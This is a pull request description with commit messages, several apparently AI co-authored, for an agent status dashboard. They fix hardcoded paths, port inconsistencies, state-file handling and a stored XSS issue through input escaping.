fix: resolve hardcoded paths, port mismatch, XSS, and UX issues
Thanks — I reviewed PR #9 and the fixes look good to me (path portability, port consistency, and related stability issues).
I’m approving and merging this as our stability baseline.
After merge, we’ll run a quick smoke test in production.
Previously every poll (3.5s per client) unconditionally wrote both
agents-state.json and join-keys.json. Now tracks a dirty flag and
only persists when cleanup actually modifies state (expired agents
removed or agents marked offline).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Backend: add html.escape() to clean_text() so user-controlled input
(agent names, details) is entity-escaped before storage.
Frontend: memo content now uses textContent instead of innerHTML
(newlines handled by CSS white-space:pre-wrap). Guest agent names
are escaped before interpolation into template literals to prevent
stored XSS via malicious agent names in onclick handlers.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Each /yesterday-memo request used random.choice for the wisdom quote,
causing the card to flicker on frontend polling. Now uses date-based
index (YYYYMMDD % len) so the same quote shows consistently all day.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Previously /set_state only wrote to state.json, but /agents reads
from agents-state.json. The main agent's status in agents-state.json
was stale. Now save_state() also updates the isMain=true entry in
agents-state.json to keep both files consistent.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
The backend runs on port 19000 (to avoid conflict with OpenClaw on
18791), but docs and scripts referenced 18791. Unified all references
to 19000 and made the port configurable via OFFICE_PORT env var.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
All scripts now use os.path.dirname(os.path.abspath(__file__)) to
dynamically resolve paths relative to their location, consistent
with backend/app.py. Also fixes healthcheck.sh to use --fail and
--max-time for curl, and corrects port references to 19000.
Affected files:
- set_state.py
- healthcheck.sh
- office-agent-push.py
- convert_to_webp.py
- repack_star_working.py
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Add clean_text(), HMAC token auth for set_state, same-origin check,
structured logging with trace IDs, and agent state normalization.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
- Add receiving and replying states for real-time OpenClaw message tracking
- Make ROOT_DIR and STATE_FILE configurable via env vars (STAR_OFFICE_ROOT, STAR_OFFICE_STATE_FILE)
- Replace hardcoded /root/ paths with relative defaults
- Add bubble texts for new states
- Include new states in auto-idle working set
Made-with: Cursor
